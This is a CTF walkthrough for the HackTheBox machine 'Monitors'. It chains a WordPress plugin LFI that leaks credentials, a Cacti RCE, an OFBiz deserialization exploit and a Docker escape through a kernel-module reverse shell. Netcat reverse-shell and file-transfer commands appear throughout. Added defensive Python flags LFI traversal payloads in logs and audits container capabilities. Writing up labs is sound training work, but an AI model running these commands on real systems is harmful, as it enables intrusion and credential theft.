Monitors is an active machine from hackthebox. So, unless you are extremely desperate to capture the flag, don’t proceed to the walkthrough. Also, I will try to keep the walkthrough as short as possible. “Monitors Walkthrough – Hackthebox – Writeup”
Note: Writing public writeups for active machines is against the rules of HTB. Otherwise, I could have protected this blog post using the root flag. Also, I couldn’t find a good content locker for WordPress that allows a custom message. So, I couldn’t password-protect this blog post using other methods like the root hash, the contents of a root-only readable file, etc.
Firstly, let’s remove the default route added by the VPN server.
sudo route del -net default gw 10.10.14.1 netmask 0.0.0.0 dev tun0
Nmap scan
nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 10.10.10.238
Enumerate web server
From the nmap results, we have an HTTP server to enumerate.
Direct access isn’t available. So, I added monitors.htb to the /etc/hosts file.
Upon opening it with the host name, we get a WordPress website.
Hence, I used wpscan to find vulnerable plugins.
wpscan --api-token $WPSCAN_KEY --url http://monitors.htb/ --plugins-detection mixed -e -o wpscan.log
cat wpscan.log
We got an unauthenticated file inclusion vulnerability in the WP Spritz plugin. Thus, I opened the links provided and also started the Burp Suite proxy to move further. Then, I issued the request and sent it to Intruder and Repeater.
As we can see, the LFI worked. Since the plugin uses the file_get_contents function, we cannot execute remote PHP code. So, I decided to get credentials from the machine instead. Hence, I looked for the WordPress configuration file.
I noted down the username and password for MySQL. Also, I tried the password to log in as the WordPress admin and to SSH in as marcus, but didn’t succeed. Hence, I decided to check the Apache configuration.
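From the defender’s side, the requests this LFI relies on leave clear traces in the web server access log. As an added example that is not part of the original writeup, here is a Python check that flags traversal sequences (including double-encoded ones), references to wp-config.php or Apache configuration files, and remote URLs passed in a plugin parameter. The log lines and the plugin path in them are constructed for the demonstration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format; only the fields the check needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')
SENSITIVE_RE = re.compile(r'wp-config\.php|/etc/(passwd|shadow)|apache2/|sites-enabled|\.htaccess', re.I)
REMOTE_RE = re.compile(r'^(https?|ftp|php|data|expect)://', re.I)

# Constructed sample lines for the demonstration; not taken from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [01/May/2021:10:00:01 +0000] "GET /wp-content/plugins/example-plugin/view.php?url=/../../../../wp-config.php HTTP/1.1" 200 2970
10.0.0.5 - - [01/May/2021:10:00:02 +0000] "GET /wp-content/plugins/example-plugin/view.php?url=%252e%252e%252f%252e%252e%252fetc%252fapache2%252fsites-enabled%252f000-default.conf HTTP/1.1" 200 1812
10.0.0.7 - - [01/May/2021:10:00:03 +0000] "GET /index.php?p=12 HTTP/1.1" 200 5310
10.0.0.5 - - [01/May/2021:10:00:04 +0000] "GET /wp-content/plugins/example-plugin/view.php?url=http://remote.example/x.txt HTTP/1.1" 200 10
"""

def fully_decode(value, rounds=3):
    # URL-decode repeatedly so double-encoded traversal (%252e%252e%252f) is not missed.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_target(target):
    # Return the reasons a request target looks like a file-inclusion attempt (empty if clean).
    reasons = []
    parts = urlsplit(target)
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_decode(raw)
        if TRAVERSAL_RE.search(value):
            reasons.append(f"traversal in parameter {name}")
        if SENSITIVE_RE.search(value):
            reasons.append(f"sensitive file in parameter {name}")
        if REMOTE_RE.match(value):
            reasons.append(f"remote URL in parameter {name}")
    return reasons

def flag_inclusion_requests(log_text):
    # Parse each log line and return one finding per suspicious request.
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = inspect_target(m.group("target"))
        if reasons:
            findings.append({"ip": m.group("ip"), "status": m.group("status"), "target": m.group("target"), "reasons": reasons})
    return findings
```

Running flag_inclusion_requests(SAMPLE_LOG) reports three of the four constructed lines, all from the same client, which is the pattern worth alerting on.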
I fuzzed with the list above and found a comment in the default Apache configuration file.
Hence, I added the hostname to my hosts file.
Using admin and the password that I found earlier in the wp-config.php file gave me access to the application.
The Cacti version is 1.2.12, which has an authenticated remote code execution exploit.
Reference: https://www.exploit-db.com/exploits/49810
nc -nlvp 4444
# On another tab
python3 exploit.py -t http://cacti-admin.monitors.htb -u admin -p <password> --lhost 10.10.14.60 --lport 4444
Finally, I got the foothold.
Get user’s shell
The first thing you want to do is make the shell interactive. Otherwise, you are going to regret it later. I looked around manually, but didn’t find anything. Hence, I decided to download Linux enumeration scripts like linpeas, LinEnum, pspy, etc. However, neither wget nor curl is installed on the target. Luckily, we have netcat on the machine. Hence, I listened as follows on my local machine.
nc -nlvp 5555 < linpeas.sh
On the target, I did the following.
cd /tmp
nc 10.10.14.60 5555 > linpeas.sh
I repeated the same for the other binaries too and ran the scripts. However, they didn’t give me anything. Then, I searched for all files owned by other users and didn’t find anything either. However, when I looked at the home directory of marcus, there is a directory .backup that has unusual permissions. So, I searched for the word marcus in files under directories that don’t contain binaries.
grep 'marcus' /etc -R 2>/dev/null
So, I looked at the content of the file.
cat /home/marcus/.backup/backup.sh
I got a password that could give me the SSH access to the user marcus.
Get root access
There is a note that mentions Docker. So, I listed the listening ports.
Hence, I set up SSH tunneling for the port.
ssh -L 8443:127.0.0.1:8443 -R 4444:127.0.0.1:4444 -R 8080:127.0.0.1:8080 [email protected]
This version of Apache OFBiz has an exploit related to deserialization.
https://www.rapid7.com/db/modules/exploit/linux/http/apache_ofbiz_deserialiation/
Next, I used Python to create another reverse shell to my local machine. That allowed me to make the shell more interactive using stty.
Now, we are inside the Docker container. After this, we have to break out of the container to the host.
capsh --print
The capability cap_sys_module would allow us to break out of the container.
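The fix on the defending side is to never grant a container capabilities beyond what it needs, and to audit running containers for ones that were. As an added example that is not part of the original writeup, here is a Python audit that decodes the CapEff mask from a process’s /proc/<pid>/status (the same data capsh --print displays), lists capabilities beyond Docker’s default set, and highlights those such as cap_sys_module that let a container affect the host kernel. The mask used in the check is constructed; the capability bit numbers come from linux/capability.h.

```python
import re

# Capability names indexed by bit number, as defined in linux/capability.h.
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner", "cap_fsetid",
    "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap", "cap_linux_immutable",
    "cap_net_bind_service", "cap_net_broadcast", "cap_net_admin", "cap_net_raw",
    "cap_ipc_lock", "cap_ipc_owner", "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot",
    "cap_sys_ptrace", "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod", "cap_lease",
    "cap_audit_write", "cap_audit_control", "cap_setfcap", "cap_mac_override",
    "cap_mac_admin", "cap_syslog", "cap_wake_alarm", "cap_block_suspend", "cap_audit_read",
    "cap_perfmon", "cap_bpf", "cap_checkpoint_restore",
]
# Capabilities that let a process reach the host kernel or other processes directly.
RISKY = {"cap_sys_module", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_rawio", "cap_dac_read_search"}
DOCKER_DEFAULT = "00000000a80425fb"  # CapEff of a container started with Docker's default capability set

def decode_caps(hex_mask):
    # Turn a CapEff/CapBnd hex mask into the list of capability names whose bit is set.
    mask = int(hex_mask, 16)
    return [name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1]

def risky_caps(hex_mask):
    return sorted(c for c in decode_caps(hex_mask) if c in RISKY)

def extra_vs_default(hex_mask):
    return sorted(set(decode_caps(hex_mask)) - set(decode_caps(DOCKER_DEFAULT)))

def cap_eff_from_status(status_text):
    # Extract the CapEff line from the text of /proc/<pid>/status.
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)", status_text, re.M)
    return m.group(1) if m else None

def audit_pid(pid):
    # Run from the host against a container's PID (e.g. from docker inspect) or "self" inside it.
    with open(f"/proc/{pid}/status") as f:
        mask = cap_eff_from_status(f.read())
    return {"caps": decode_caps(mask), "extra": extra_vs_default(mask), "risky": risky_caps(mask)}

if __name__ == "__main__":
    import sys
    print(audit_pid(sys.argv[1] if len(sys.argv) > 1 else "self"))
```

A non-empty "risky" or "extra" list for a container is the finding to act on, typically by dropping the capability in the container’s run configuration.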
Following the guide, I copied the source code of the reverse shell kernel module. I changed the IP and the port so that I would listen on the host. For that, I first copied the code to my local machine, edited it, and then copied it to the container’s ‘/’ path.
Then, I created the Makefile.
Then, I made the kernel module.
make
It didn’t work. So, I copied the two files to ‘/’ of the container. Then, I added the gcc library directory to the PATH.
mv reverse-shell.c /
mv Makefile /
cd /
export PATH=$PATH:/usr/lib/gcc/x86_64-linux-gnu/8/
make clean
make
It succeeded and I could see some new files in the directory. Then, I listened on port 4445 of the host machine from the SSH login.
nc -nlvp 4445
Lastly, I executed the exploit in the Docker container.
insmod reverse-shell.ko
This might not work because you might be working in a shared environment. So, reset your machine, repeat the steps, and voila.
I got the root shell on the Monitors host.